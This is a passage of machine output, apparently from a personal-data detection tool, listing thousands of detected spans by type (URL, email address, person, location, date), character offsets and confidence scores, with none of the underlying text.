4066, score: 0.5, type: URL, start: 4185, end: 4191, score: 0.5, type: URL, start: 4211, end: 4225, score: 0.5, type: URL, start: 4233, end: 4239, score: 0.5, type: URL, start: 4250, end: 4264, score: 0.5, type: URL, start: 4315, end: 4328, score: 0.5, type: URL, start: 4330, end: 4336, score: 0.5, type: URL, start: 4448, end: 4464, score: 0.5, type: URL, start: 4582, end: 4592, score: 0.5, type: URL, start: 4655, end: 4661, score: 0.5, type: URL, start: 4687, end: 4693, score: 0.5, type: URL, start: 4738, end: 4744, score: 0.5, type: URL, start: 4746, end: 4757, score: 0.5, type: URL, start: 4819, end: 4833, score: 0.5, type: URL, start: 4836, end: 4843, score: 0.5, type: URL, start: 4852, end: 4860, score: 0.5, type: URL, start: 4918, end: 4934, score: 0.5, type: URL, start: 4996, end: 5006, score: 0.5, type: URL, start: 5045, end: 5051, score: 0.5, type: URL, start: 5053, end: 5064, score: 0.5, type: URL, start: 5118, end: 5132, score: 0.5, type: URL, start: 5135, end: 5142, score: 0.5, type: URL, start: 5151, end: 5159, score: 0.5, type: URL, start: 5272, end: 5282, score: 0.5, type: URL, start: 5321, end: 5331, score: 0.5, type: URL, start: 5333, end: 5344, score: 0.5, type: URL, start: 5413, end: 5427, score: 0.5, type: URL, start: 5430, end: 5437, score: 0.5, type: URL, start: 5446, end: 5454, score: 0.5, type: URL, start: 5549, end: 5563, score: 0.5, type: URL, start: 5566, end: 5573, score: 0.5, type: URL, start: 5585, end: 5599, score: 0.5, type: URL, start: 5665, end: 5681, score: 0.5, type: URL, start: 5717, end: 5723, score: 0.5, type: URL, start: 5891, end: 5905, score: 0.5, type: URL, start: 5965, end: 5979, score: 0.5, type: URL, start: 6003, end: 6013, score: 0.5, type: URL, start: 6048, end: 6062, score: 0.5, type: URL, start: 6086, end: 6100, score: 0.5, type: URL, start: 6122, end: 6148, score: 0.5, type: URL, start: 6416, end: 6426, score: 0.5, type: URL, start: 6451, end: 6460, score: 0.5, type: URL, start: 6552, end: 6562, score: 0.5, type: URL, start: 6713, end: 6724, score: 0.5, type: URL, start: 6739, end: 6746, score: 0.5, type: URL, start: 
6780, end: 6787, score: 0.5, type: URL, start: 6802, end: 6809, score: 0.5, type: EMAIL_ADDRESS, start: 266, end: 281, score: 1.0, type: EMAIL_ADDRESS, start: 1658, end: 1673, score: 1.0, type: EMAIL_ADDRESS, start: 1676, end: 1691, score: 1.0, type: URL, start: 1449, end: 1493, score: 0.95, type: URL, start: 1547, end: 1592, score: 0.95, type: DATE_TIME, start: 95, end: 104, score: 0.85, type: PERSON, start: 252, end: 264, score: 0.85, type: DATE_TIME, start: 647, end: 660, score: 0.85, type: LOCATION, start: 1127, end: 1133, score: 0.85, type: LOCATION, start: 1149, end: 1152, score: 0.85, type: URL, start: 344, end: 373, score: 0.6, type: URL, start: 1387, end: 1432, score: 0.6, type: URL, start: 272, end: 281, score: 0.5, type: URL, start: 1664, end: 1673, score: 0.5, type: URL, start: 1682, end: 1691, score: 0.5, type: EMAIL_ADDRESS, start: 131, end: 146, score: 1.0, type: DATE_TIME, start: 185, end: 195, score: 0.85, type: DATE_TIME, start: 212, end: 222, score: 0.85, type: URL, start: 137, end: 146, score: 0.5, type: EMAIL_ADDRESS, start: 106, end: 121, score: 1.0, type: PERSON, start: 92, end: 105, score: 0.85, type: PERSON, start: 159, end: 164, score: 0.85, type: LOCATION, start: 569, end: 570, score: 0.85, type: LOCATION, start: 598, end: 599, score: 0.85, type: LOCATION, start: 1187, end: 1194, score: 0.85, type: PERSON, start: 1938, end: 1950, score: 0.85, type: PERSON, start: 4662, end: 4678, score: 0.85, type: PERSON, start: 8507, end: 8549, score: 0.85, type: PERSON, start: 8972, end: 8974, score: 0.85, type: URL, start: 112, end: 121, score: 0.5, type: URL, start: 353, end: 361, score: 0.5, type: URL, start: 378, end: 393, score: 0.5, type: URL, start: 1020, end: 1039, score: 0.5, type: URL, start: 1333, end: 1352, score: 0.5, type: URL, start: 1366, end: 1373, score: 0.5, type: URL, start: 2384, end: 2392, score: 0.5, type: URL, start: 2522, end: 2530, score: 0.5, type: URL, start: 2840, end: 2848, score: 0.5, type: URL, start: 3113, end: 3120, score: 0.5, type: URL, start: 3390, end: 3398, score: 0.5, type: URL, start: 3697, end: 3704, score: 0.5, type: URL, start: 3728, end: 3735, score: 0.5, type: URL, start: 3758, end: 3765, score: 0.5, type: URL, start: 4091, end: 4099, score: 0.5, type: URL, start: 4314, end: 4324, score: 0.5, type: URL, start: 4888, end: 4898, score: 0.5, type: URL, start: 4908, end: 4918, score: 0.5, type: URL, start: 5159, end: 5169, score: 0.5, type: URL, start: 5179, end: 5189, score: 0.5, type: URL, start: 5482, end: 5491, score: 0.5, type: URL, start: 5553, end: 5563, score: 0.5, type: URL, start: 5573, end: 5583, score: 0.5, type: URL, start: 5780, end: 5790, score: 0.5, type: URL, start: 6189, end: 6199, score: 0.5, type: URL, start: 6333, end: 6343, score: 0.5, type: URL, start: 6353, end: 6363, score: 0.5, type: URL, start: 6503, end: 6513, score: 0.5, type: URL, start: 6549, end: 6559, score: 0.5, type: URL, start: 6578, end: 6588, score: 0.5, type: URL, start: 6895, end: 6902, score: 0.5, type: URL, start: 6916, end: 6925, score: 0.5, type: URL, start: 7105, end: 7112, score: 0.5, type: URL, start: 7236, end: 7243, score: 0.5, type: URL, start: 7377, end: 7387, score: 0.5, type: URL, start: 7437, end: 7447, score: 0.5, type: URL, start: 7466, end: 7476, score: 0.5, type: URL, start: 7712, end: 7719, score: 0.5, type: URL, start: 7799, end: 7809, score: 0.5, type: URL, start: 7819, end: 7829, score: 0.5, type: URL, start: 9221, end: 9230, score: 0.5, type: EMAIL_ADDRESS, start: 263, end: 278, score: 1.0, type: EMAIL_ADDRESS, start: 349, 
end: 364, score: 1.0, type: EMAIL_ADDRESS, start: 637, end: 652, score: 1.0, type: PERSON, start: 88, end: 158, score: 0.85, type: PERSON, start: 250, end: 262, score: 0.85, type: PERSON, start: 336, end: 348, score: 0.85, type: PERSON, start: 624, end: 636, score: 0.85, type: DATE_TIME, start: 716, end: 726, score: 0.85, type: LOCATION, start: 2243, end: 2254, score: 0.85, type: PERSON, start: 2928, end: 2952, score: 0.85, type: PERSON, start: 2992, end: 2997, score: 0.85, type: PERSON, start: 5457, end: 5465, score: 0.85, type: PERSON, start: 6082, end: 6099, score: 0.85, type: URL, start: 269, end: 278, score: 0.5, type: URL, start: 355, end: 364, score: 0.5, type: URL, start: 643, end: 652, score: 0.5, type: URL, start: 705, end: 711, score: 0.5, type: URL, start: 1287, end: 1293, score: 0.5, type: URL, start: 1550, end: 1557, score: 0.5, type: URL, start: 1585, end: 1592, score: 0.5, type: URL, start: 1622, end: 1632, score: 0.5, type: URL, start: 1662, end: 1667, score: 0.5, type: URL, start: 1807, end: 1812, score: 0.5, type: URL, start: 1822, end: 1832, score: 0.5, type: URL, start: 1914, end: 1919, score: 0.5, type: URL, start: 2013, end: 2020, score: 0.5, type: URL, start: 2243, end: 2250, score: 0.5, type: URL, start: 2296, end: 2306, score: 0.5, type: URL, start: 2336, end: 2341, score: 0.5, type: URL, start: 2454, end: 2459, score: 0.5, type: URL, start: 2469, end: 2479, score: 0.5, type: URL, start: 2736, end: 2743, score: 0.5, type: URL, start: 2752, end: 2757, score: 0.5, type: URL, start: 2836, end: 2849, score: 0.5, type: URL, start: 2881, end: 2889, score: 0.5, type: URL, start: 3000, end: 3008, score: 0.5, type: URL, start: 3013, end: 3018, score: 0.5, type: URL, start: 3163, end: 3170, score: 0.5, type: URL, start: 3234, end: 3241, score: 0.5, type: URL, start: 3381, end: 3386, score: 0.5, type: URL, start: 3732, end: 3739, score: 0.5, type: URL, start: 3800, end: 3807, score: 0.5, type: URL, start: 3971, end: 3978, score: 0.5, type: URL, start: 4044, end: 4051, score: 0.5, type: URL, start: 4223, end: 4230, score: 0.5, type: URL, start: 4309, end: 4316, score: 0.5, type: URL, start: 4510, end: 4517, score: 0.5, type: URL, start: 4551, end: 4558, score: 0.5, type: URL, start: 4771, end: 4778, score: 0.5, type: URL, start: 4842, end: 4848, score: 0.5, type: URL, start: 4867, end: 4874, score: 0.5, type: URL, start: 5215, end: 5222, score: 0.5, type: URL, start: 5323, end: 5329, score: 0.5, type: URL, start: 5393, end: 5400, score: 0.5, type: URL, start: 5686, end: 5693, score: 0.5, type: URL, start: 5876, end: 5883, score: 0.5, type: URL, start: 6020, end: 6027, score: 0.5, type: URL, start: 6165, end: 6174, score: 0.5, type: URL, start: 6206, end: 6213, score: 0.5, type: URL, start: 6334, end: 6341, score: 0.5, type: URL, start: 6352, end: 6359, score: 0.5, type: URL, start: 6465, end: 6472, score: 0.5, type: URL, start: 6666, end: 6670, score: 0.5, type: URL, start: 6726, end: 6730, score: 0.5, type: URL, start: 6986, end: 6993, score: 0.5, type: URL, start: 7447, end: 7454, score: 0.5, type: URL, start: 7503, end: 7510, score: 0.5, type: URL, start: 7550, end: 7557, score: 0.5, type: URL, start: 7583, end: 7588, score: 0.5, type: URL, start: 7656, end: 7662, score: 0.5, type: URL, start: 7721, end: 7728, score: 0.5, type: URL, start: 7877, end: 7885, score: 0.5, type: URL, start: 7897, end: 7902, score: 0.5, type: URL, start: 7920, end: 7925, score: 0.5, type: URL, start: 7952, end: 7960, score: 0.5, type: URL, start: 7989, end: 7994, score: 0.5, type: URL, start: 
8020, end: 8027, score: 0.5, type: URL, start: 8493, end: 8502, score: 0.5, type: URL, start: 8531, end: 8536, score: 0.5, type: URL, start: 8833, end: 8840, score: 0.5, type: URL, start: 9108, end: 9115, score: 0.5, type: URL, start: 9335, end: 9345, score: 0.5, type: URL, start: 9754, end: 9761, score: 0.5, type: URL, start: 9846, end: 9859, score: 0.5, type: URL, start: 131, end: 140, score: 0.85, type: LOCATION, start: 738, end: 746, score: 0.85, type: PERSON, start: 1869, end: 1898, score: 0.85, type: LOCATION, start: 2064, end: 2068, score: 0.85, type: LOCATION, start: 2337, end: 2341, score: 0.85, type: LOCATION, start: 2824, end: 2828, score: 0.85, type: LOCATION, start: 3076, end: 3080, score: 0.85, type: LOCATION, start: 3347, end: 3351, score: 0.85, type: LOCATION, start: 3626, end: 3630, score: 0.85, type: LOCATION, start: 3632, end: 3647, score: 0.85, type: LOCATION, start: 3897, end: 3901, score: 0.85, type: LOCATION, start: 4853, end: 4857, score: 0.85, type: LOCATION, start: 5224, end: 5228, score: 0.85, type: LOCATION, start: 5459, end: 5463, score: 0.85, type: PERSON, start: 5586, end: 5597, score: 0.85, type: PERSON, start: 5640, end: 5651, score: 0.85, type: LOCATION, start: 5860, end: 5864, score: 0.85, type: LOCATION, start: 6119, end: 6123, score: 0.85, type: LOCATION, start: 6611, end: 6615, score: 0.85, type: LOCATION, start: 7014, end: 7018, score: 0.85, type: LOCATION, start: 7616, end: 7629, score: 0.85, type: PERSON, start: 7807, end: 7819, score: 0.85, type: LOCATION, start: 9047, end: 9051, score: 0.85, type: PERSON, start: 9117, end: 9127, score: 0.85, type: LOCATION, start: 9581, end: 9585, score: 0.85, type: LOCATION, start: 12989, end: 12993, score: 0.85, type: LOCATION, start: 14233, end: 14237, score: 0.85, type: PERSON, start: 14425, end: 14442, score: 0.85, type: LOCATION, start: 14971, end: 14975, score: 0.85, type: PERSON, start: 15136, end: 15153, score: 0.85, type: LOCATION, start: 15695, end: 15699, score: 0.85, type: PERSON, start: 15710, end: 15717, score: 0.85, type: PERSON, start: 15935, end: 15941, score: 0.85, type: PERSON, start: 15944, end: 15998, score: 0.85, type: PERSON, start: 16738, end: 16746, score: 0.85, type: PERSON, start: 16811, end: 16818, score: 0.85, type: LOCATION, start: 17252, end: 17256, score: 0.85, type: LOCATION, start: 17498, end: 17502, score: 0.85, type: PERSON, start: 17515, end: 17519, score: 0.85, type: DATE_TIME, start: 18229, end: 18231, score: 0.85, type: DATE_TIME, start: 19283, end: 19285, score: 0.85, type: LOCATION, start: 19453, end: 19457, score: 0.85, type: NRP, start: 19468, end: 19474, score: 0.85, type: LOCATION, start: 19640, end: 19644, score: 0.85, type: NRP, start: 19655, end: 19661, score: 0.85, type: LOCATION, start: 19834, end: 19838, score: 0.85, type: LOCATION, start: 19999, end: 20003, score: 0.85, type: URL, start: 795, end: 877, score: 0.6, type: URL, start: 882, end: 964, score: 0.6, type: URL, start: 969, end: 1053, score: 0.6, type: URL, start: 3754, end: 3815, score: 0.6, type: URL, start: 4111, end: 4172, score: 0.6, type: URL, start: 4244, end: 4298, score: 0.6, type: URL, start: 417, end: 434, score: 0.5, type: URL, start: 631, end: 639, score: 0.5, type: URL, start: 1173, end: 1187, score: 0.5, type: URL, start: 1745, end: 1751, score: 0.5, type: URL, start: 1785, end: 1791, score: 0.5, type: URL, start: 2143, end: 2150, score: 0.5, type: URL, start: 2182, end: 2189, score: 0.5, type: URL, start: 2234, end: 2241, score: 0.5, type: URL, start: 2352, end: 2359, score: 0.5, type: 
URL, start: 2507, end: 2514, score: 0.5, type: URL, start: 2912, end: 2919, score: 0.5, type: URL, start: 2956, end: 2963, score: 0.5, type: URL, start: 2981, end: 2989, score: 0.5, type: URL, start: 3179, end: 3186, score: 0.5, type: URL, start: 3223, end: 3230, score: 0.5, type: URL, start: 3248, end: 3256, score: 0.5, type: URL, start: 3465, end: 3470, score: 0.5, type: URL, start: 3581, end: 3598, score: 0.5, type: URL, start: 3852, end: 3869, score: 0.5, type: URL, start: 4316, end: 4357, score: 0.5, type: URL, start: 4388, end: 4401, score: 0.5, type: URL, start: 4427, end: 4434, score: 0.5, type: URL, start: 4617, end: 4624, score: 0.5, type: URL, start: 4669, end: 4676, score: 0.5, type: URL, start: 4698, end: 4710, score: 0.5, type: URL, start: 4725, end: 4732, score: 0.5, type: URL, start: 4775, end: 4787, score: 0.5, type: URL, start: 4968, end: 4981, score: 0.5, type: URL, start: 5000, end: 5013, score: 0.5, type: URL, start: 5117, end: 5124, score: 0.5, type: URL, start: 5246, end: 5259, score: 0.5, type: URL, start: 5291, end: 5298, score: 0.5, type: URL, start: 5323, end: 5330, score: 0.5, type: URL, start: 5362, end: 5369, score: 0.5, type: URL, start: 5500, end: 5507, score: 0.5, type: URL, start: 5561, end: 5568, score: 0.5, type: URL, start: 5607, end: 5614, score: 0.5, type: URL, start: 5669, end: 5682, score: 0.5, type: URL, start: 5704, end: 5711, score: 0.5, type: URL, start: 5756, end: 5763, score: 0.5, type: URL, start: 5882, end: 5895, score: 0.5, type: URL, start: 5917, end: 5924, score: 0.5, type: URL, start: 5983, end: 5990, score: 0.5, type: URL, start: 6141, end: 6154, score: 0.5, type: URL, start: 6185, end: 6192, score: 0.5, type: URL, start: 6250, end: 6257, score: 0.5, type: URL, start: 6309, end: 6316, score: 0.5, type: URL, start: 6370, end: 6377, score: 0.5, type: URL, start: 6414, end: 6421, score: 0.5, type: URL, start: 6459, end: 6466, score: 0.5, type: URL, start: 6515, end: 6522, score: 0.5, type: URL, start: 6738, end: 6751, score: 0.5, type: URL, start: 6774, end: 6792, score: 0.5, type: URL, start: 6810, end: 6822, score: 0.5, type: URL, start: 6910, end: 6917, score: 0.5, type: URL, start: 7118, end: 7125, score: 0.5, type: URL, start: 7171, end: 7178, score: 0.5, type: URL, start: 7201, end: 7213, score: 0.5, type: URL, start: 7254, end: 7264, score: 0.5, type: URL, start: 7300, end: 7307, score: 0.5, type: URL, start: 7339, end: 7346, score: 0.5, type: URL, start: 7856, end: 7863, score: 0.5, type: URL, start: 7886, end: 7898, score: 0.5, type: URL, start: 7931, end: 7938, score: 0.5, type: URL, start: 7961, end: 7973, score: 0.5, type: URL, start: 8006, end: 8013, score: 0.5, type: URL, start: 8036, end: 8048, score: 0.5, type: URL, start: 8082, end: 8089, score: 0.5, type: URL, start: 8112, end: 8124, score: 0.5, type: URL, start: 8153, end: 8160, score: 0.5, type: URL, start: 8183, end: 8195, score: 0.5, type: URL, start: 8226, end: 8233, score: 0.5, type: URL, start: 8256, end: 8268, score: 0.5, type: URL, start: 8297, end: 8304, score: 0.5, type: URL, start: 8327, end: 8339, score: 0.5, type: URL, start: 8369, end: 8376, score: 0.5, type: URL, start: 8399, end: 8411, score: 0.5, type: URL, start: 8452, end: 8459, score: 0.5, type: URL, start: 8482, end: 8494, score: 0.5, type: URL, start: 8531, end: 8538, score: 0.5, type: URL, start: 8561, end: 8573, score: 0.5, type: URL, start: 8600, end: 8607, score: 0.5, type: URL, start: 8630, end: 8642, score: 0.5, type: URL, start: 8673, end: 8680, score: 0.5, type: URL, start: 8703, end: 8715, 
score: 0.5, type: URL, start: 8755, end: 8762, score: 0.5, type: URL, start: 8785, end: 8797, score: 0.5, type: URL, start: 8835, end: 8842, score: 0.5, type: URL, start: 8865, end: 8877, score: 0.5, type: URL, start: 8918, end: 8925, score: 0.5, type: URL, start: 8948, end: 8960, score: 0.5, type: URL, start: 9257, end: 9265, score: 0.5, type: URL, start: 9275, end: 9285, score: 0.5, type: URL, start: 9318, end: 9325, score: 0.5, type: URL, start: 9359, end: 9366, score: 0.5, type: URL, start: 9411, end: 9418, score: 0.5, type: URL, start: 9455, end: 9462, score: 0.5, type: URL, start: 9755, end: 9762, score: 0.5, type: URL, start: 9915, end: 9922, score: 0.5, type: URL, start: 10080, end: 10087, score: 0.5, type: URL, start: 10244, end: 10251, score: 0.5, type: URL, start: 10541, end: 10548, score: 0.5, type: URL, start: 10701, end: 10708, score: 0.5, type: URL, start: 10866, end: 10873, score: 0.5, type: URL, start: 11030, end: 11037, score: 0.5, type: URL, start: 11323, end: 11330, score: 0.5, type: URL, start: 11483, end: 11490, score: 0.5, type: URL, start: 11647, end: 11654, score: 0.5, type: URL, start: 11812, end: 11819, score: 0.5, type: URL, start: 12034, end: 12041, score: 0.5, type: URL, start: 12274, end: 12281, score: 0.5, type: URL, start: 12434, end: 12441, score: 0.5, type: URL, start: 12599, end: 12606, score: 0.5, type: URL, start: 12764, end: 12771, score: 0.5, type: URL, start: 13037, end: 13044, score: 0.5, type: URL, start: 13110, end: 13117, score: 0.5, type: URL, start: 13183, end: 13190, score: 0.5, type: URL, start: 13258, end: 13265, score: 0.5, type: URL, start: 13331, end: 13338, score: 0.5, type: URL, start: 13402, end: 13409, score: 0.5, type: URL, start: 13469, end: 13476, score: 0.5, type: URL, start: 13540, end: 13547, score: 0.5, type: URL, start: 13613, end: 13620, score: 0.5, type: URL, start: 13690, end: 13697, score: 0.5, type: URL, start: 13757, end: 13764, score: 0.5, type: URL, start: 13834, end: 13841, score: 0.5, type: URL, start: 13912, end: 13919, score: 0.5, type: URL, start: 13995, end: 14002, score: 0.5, type: URL, start: 14082, end: 14089, score: 0.5, type: URL, start: 14399, end: 14416, score: 0.5, type: URL, start: 14471, end: 14484, score: 0.5, type: URL, start: 14573, end: 14580, score: 0.5, type: URL, start: 14680, end: 14697, score: 0.5, type: URL, start: 14827, end: 14834, score: 0.5, type: URL, start: 15110, end: 15127, score: 0.5, type: URL, start: 15182, end: 15195, score: 0.5, type: URL, start: 15296, end: 15303, score: 0.5, type: URL, start: 15386, end: 15399, score: 0.5, type: URL, start: 15541, end: 15548, score: 0.5, type: URL, start: 15870, end: 15887, score: 0.5, type: URL, start: 15944, end: 15957, score: 0.5, type: URL, start: 16061, end: 16068, score: 0.5, type: URL, start: 16176, end: 16189, score: 0.5, type: URL, start: 16334, end: 16341, score: 0.5, type: URL, start: 16673, end: 16690, score: 0.5, type: URL, start: 16747, end: 16760, score: 0.5, type: URL, start: 16864, end: 16871, score: 0.5, type: URL, start: 16966, end: 16979, score: 0.5, type: URL, start: 17124, end: 17131, score: 0.5, type: URL, start: 17300, end: 17307, score: 0.5, type: URL, start: 17352, end: 17359, score: 0.5, type: URL, start: 17397, end: 17404, score: 0.5, type: URL, start: 17520, end: 17531, score: 0.5, type: URL, start: 17715, end: 17721, score: 0.5, type: URL, start: 17873, end: 17879, score: 0.5, type: URL, start: 17918, end: 17924, score: 0.5, type: URL, start: 18105, end: 18110, score: 0.5, type: URL, start: 18689, end: 18694, 
score: 0.5, type: URL, start: 18948, end: 18955, score: 0.5, type: URL, start: 18978, end: 18986, score: 0.5, type: URL, start: 19477, end: 19484, score: 0.5, type: URL, start: 19509, end: 19516, score: 0.5, type: URL, start: 19664, end: 19671, score: 0.5, type: URL, start: 19696, end: 19703, score: 0.5, type: URL, start: 19849, end: 19856, score: 0.5, type: URL, start: 19866, end: 19873, score: 0.5, type: URL, start: 20014, end: 20021, score: 0.5, type: URL, start: 20031, end: 20049, score: 0.5, type: EMAIL_ADDRESS, start: 99, end: 114, score: 1.0, type: DATE_TIME, start: 28, end: 55, score: 0.85, type: DATE_TIME, start: 57, end: 61, score: 0.85, type: PERSON, start: 794, end: 812, score: 0.85, type: PERSON, start: 835, end: 842, score: 0.85, type: PERSON, start: 1277, end: 1284, score: 0.85, type: PERSON, start: 1726, end: 1734, score: 0.85, type: NRP, start: 1824, end: 1830, score: 0.85, type: NRP, start: 1972, end: 1981, score: 0.85, type: LOCATION, start: 1994, end: 2014, score: 0.85, type: LOCATION, start: 2057, end: 2063, score: 0.85, type: PERSON, start: 2182, end: 2207, score: 0.85, type: NRP, start: 2370, end: 2382, score: 0.85, type: PERSON, start: 2459, end: 2480, score: 0.85, type: NRP, start: 2600, end: 2606, score: 0.85, type: URL, start: 77, end: 98, score: 0.6, type: URL, start: 756, end: 784, score: 0.6, type: URL, start: 105, end: 114, score: 0.5, type: URL, start: 867, end: 875, score: 0.5, type: URL, start: 905, end: 916, score: 0.5, type: URL, start: 941, end: 956, score: 0.5, type: URL, start: 1005, end: 1024, score: 0.5, type: URL, start: 1074, end: 1093, score: 0.5, type: URL, start: 1139, end: 1153, score: 0.5, type: URL, start: 1571, end: 1595, score: 0.5, type: URL, start: 1631, end: 1638, score: 0.5, type: URL, start: 1645, end: 1662, score: 0.5, type: URL, start: 1834, end: 1859, score: 0.5, type: URL, start: 1895, end: 1903, score: 0.5, type: URL, start: 1909, end: 1916, score: 0.5, type: URL, start: 2370, end: 2377, score: 0.5, type: URL, start: 2610, end: 2635, score: 0.5, type: URL, start: 2774, end: 2782, score: 0.5, type: URL, start: 2788, end: 2795, score: 0.5, type: EMAIL_ADDRESS, start: 130, end: 145, score: 1.0, type: EMAIL_ADDRESS, start: 178, end: 193, score: 1.0, type: PERSON, start: 117, end: 129, score: 0.85, type: PERSON, start: 164, end: 177, score: 0.85, type: IP_ADDRESS, start: 116, end: 117, score: 0.6, type: IP_ADDRESS, start: 161, end: 164, score: 0.6, type: URL, start: 136, end: 145, score: 0.5, type: URL, start: 184, end: 193, score: 0.5, type: URL, start: 605, end: 612, score: 0.5, type: URL, start: 648, end: 655, score: 0.5, type: URL, start: 967, end: 974, score: 0.5, type: URL, start: 1003, end: 1010, score: 0.5, type: URL, start: 1055, end: 1062, score: 0.5, type: EMAIL_ADDRESS, start: 13718, end: 13733, score: 1.0, type: LOCATION, start: 25, end: 26, score: 0.85, type: LOCATION, start: 28, end: 29, score: 0.85, type: NRP, start: 54, end: 60, score: 0.85, type: DATE_TIME, start: 78, end: 89, score: 0.85, type: LOCATION, start: 390, end: 391, score: 0.85, type: LOCATION, start: 633, end: 634, score: 0.85, type: NRP, start: 1347, end: 1377, score: 0.85, type: LOCATION, start: 1839, end: 1864, score: 0.85, type: PERSON, start: 2540, end: 2554, score: 0.85, type: PERSON, start: 2671, end: 2676, score: 0.85, type: PERSON, start: 3055, end: 3086, score: 0.85, type: PERSON, start: 3957, end: 3971, score: 0.85, type: PERSON, start: 4059, end: 4064, score: 0.85, type: PERSON, start: 4450, end: 4481, score: 0.85, type: PERSON, start: 5044, 
end: 5058, score: 0.85, type: PERSON, start: 5160, end: 5165, score: 0.85, type: PERSON, start: 5350, end: 5366, score: 0.85, type: PERSON, start: 5982, end: 5998, score: 0.85, type: DATE_TIME, start: 6375, end: 6388, score: 0.85, type: PERSON, start: 6549, end: 6566, score: 0.85, type: PERSON, start: 8247, end: 8252, score: 0.85, type: PERSON, start: 8561, end: 8581, score: 0.85, type: PERSON, start: 8988, end: 9004, score: 0.85, type: PERSON, start: 9295, end: 9308, score: 0.85, type: PERSON, start: 10334, end: 10340, score: 0.85, type: PERSON, start: 10629, end: 10680, score: 0.85, type: PERSON, start: 10967, end: 10980, score: 0.85, type: NRP, start: 11126, end: 11135, score: 0.85, type: LOCATION, start: 11787, end: 11828, score: 0.85, type: DATE_TIME, start: 13097, end: 13102, score: 0.85, type: DATE_TIME, start: 13188, end: 13194, score: 0.85, type: DATE_TIME, start: 13333, end: 13340, score: 0.85, type: DATE_TIME, start: 13404, end: 13434, score: 0.85, type: PERSON, start: 13737, end: 13745, score: 0.85, type: URL, start: 13857, end: 13865, score: 0.85, type: URL, start: 13898, end: 13906, score: 0.85, type: URL, start: 13939, end: 13947, score: 0.85, type: URL, start: 14149, end: 14167, score: 0.85, type: PERSON, start: 15151, end: 15160, score: 0.85, type: URL, start: 740, end: 768, score: 0.6, type: URL, start: 1005, end: 1019, score: 0.5, type: URL, start: 1043, end: 1052, score: 0.5, type: URL, start: 1073, end: 1087, score: 0.5, type: URL, start: 1116, end: 1125, score: 0.5, type: URL, start: 1173, end: 1200, score: 0.5, type: URL, start: 1291, end: 1311, score: 0.5, type: URL, start: 1347, end: 1374, score: 0.5, type: URL, start: 1443, end: 1456, score: 0.5, type: URL, start: 1487, end: 1500, score: 0.5, type: URL, start: 1503, end: 1509, score: 0.5, type: URL, start: 1533, end: 1546, score: 0.5, type: URL, start: 1549, end: 1555, score: 0.5, type: URL, start: 1588, end: 1601, score: 0.5, type: URL, start: 1645, end: 1653, score: 0.5, type: URL, start: 1695, end: 1710, score: 0.5, type: URL, start: 1928, end: 1937, score: 0.5, type: URL, start: 2045, end: 2052, score: 0.5, type: URL, start: 2268, end: 2277, score: 0.5, type: URL, start: 2339, end: 2344, score: 0.5, type: URL, start: 2356, end: 2370, score: 0.5, type: URL, start: 3061, end: 3072, score: 0.5, type: URL, start: 3197, end: 3204, score: 0.5, type: URL, start: 3306, end: 3316, score: 0.5, type: URL, start: 3350, end: 3356, score: 0.5, type: URL, start: 3566, end: 3580, score: 0.5, type: URL, start: 3583, end: 3588, score: 0.5, type: URL, start: 3737, end: 3751, score: 0.5, type: URL, start: 4360, end: 4369, score: 0.5, type: URL, start: 4456, end: 4467, score: 0.5, type: URL, start: 4614, end: 4621, score: 0.5, type: URL, start: 4738, end: 4744, score: 0.5, type: URL, start: 4746, end: 4758, score: 0.5, type: URL, start: 4858, end: 4872, score: 0.5, type: URL, start: 5493, end: 5504, score: 0.5, type: URL, start: 5511, end: 5527, score: 0.5, type: URL, start: 5703, end: 5717, score: 0.5, type: URL, start: 6044, end: 6053, score: 0.5, type: URL, start: 6161, end: 6168, score: 0.5, type: URL, start: 6515, end: 6526, score: 0.5, type: URL, start: 7333, end: 7342, score: 0.5, type: URL, start: 7494, end: 7501, score: 0.5, type: URL, start: 7670, end: 7679, score: 0.5, type: URL, start: 7744, end: 7749, score: 0.5, type: URL, start: 7801, end: 7808, score: 0.5, type: URL, start: 7820, end: 7825, score: 0.5, type: URL, start: 7878, end: 7885, score: 0.5, type: URL, start: 7900, end: 7905, score: 0.5, type: URL, start: 
8231, end: 8249, score: 0.5, type: URL, start: 8317, end: 8324, score: 0.5, type: URL, start: 8634, end: 8648, score: 0.5, type: URL, start: 8681, end: 8686, score: 0.5, type: URL, start: 8952, end: 8965, score: 0.5, type: URL, start: 8988, end: 8993, score: 0.5, type: URL, start: 9040, end: 9054, score: 0.5, type: URL, start: 9486, end: 9500, score: 0.5, type: URL, start: 9642, end: 9656, score: 0.5, type: URL, start: 9994, end: 10008, score: 0.5, type: URL, start: 10074, end: 10088, score: 0.5, type: URL, start: 10204, end: 10215, score: 0.5, type: URL, start: 10468, end: 10482, score: 0.5, type: URL, start: 10549, end: 10563, score: 0.5, type: URL, start: 10612, end: 10620, score: 0.5, type: URL, start: 10649, end: 10663, score: 0.5, type: URL, start: 11485, end: 11500, score: 0.5, type: URL, start: 11690, end: 11697, score: 0.5, type: URL, start: 12085, end: 12099, score: 0.5, type: URL, start: 12244, end: 12258, score: 0.5, type: URL, start: 12306, end: 12322, score: 0.5, type: URL, start: 12336, end: 12350, score: 0.5, type: URL, start: 12596, end: 12600, score: 0.5, type: URL, start: 13285, end: 13303, score: 0.5, type: URL, start: 13580, end: 13592, score: 0.5, type: URL, start: 13701, end: 13709, score: 0.5, type: URL, start: 13724, end: 13733, score: 0.5, type: URL, start: 13753, end: 13761, score: 0.5, type: URL, start: 13783, end: 13791, score: 0.5, type: URL, start: 13822, end: 13830, score: 0.5, type: URL, start: 14027, end: 14035, score: 0.5, type: URL, start: 14180, end: 14188, score: 0.5, type: URL, start: 14240, end: 14246, score: 0.5, type: URL, start: 14298, end: 14303, score: 0.5, type: URL, start: 14332, end: 14337, score: 0.5, type: URL, start: 14363, end: 14381, score: 0.5, type: URL, start: 15235, end: 15249, score: 0.5, type: URL, start: 15334, end: 15348, score: 0.5, type: URL, start: 15471, end: 15485, score: 0.5, type: URL, start: 15554, end: 15568, score: 0.5, type: URL, start: 15621, end: 15635, score: 0.5, type: URL, start: 15673, end: 15687, score: 0.5, type: URL, start: 15699, end: 15713, score: 0.5, type: URL, start: 15777, end: 15791, score: 0.5, type: URL, start: 15909, end: 15923, score: 0.5, type: URL, start: 15985, end: 15999, score: 0.5, type: URL, start: 16067, end: 16081, score: 0.5, type: URL, start: 16158, end: 16172, score: 0.5, type: URL, start: 16273, end: 16287, score: 0.5, type: URL, start: 16389, end: 16395, score: 0.5, type: URL, start: 16453, end: 16467, score: 0.5, type: URL, start: 16476, end: 16483, score: 0.5, type: DATE_TIME, start: 36, end: 40, score: 0.85, type: PERSON, start: 1888, end: 1920, score: 0.85, type: 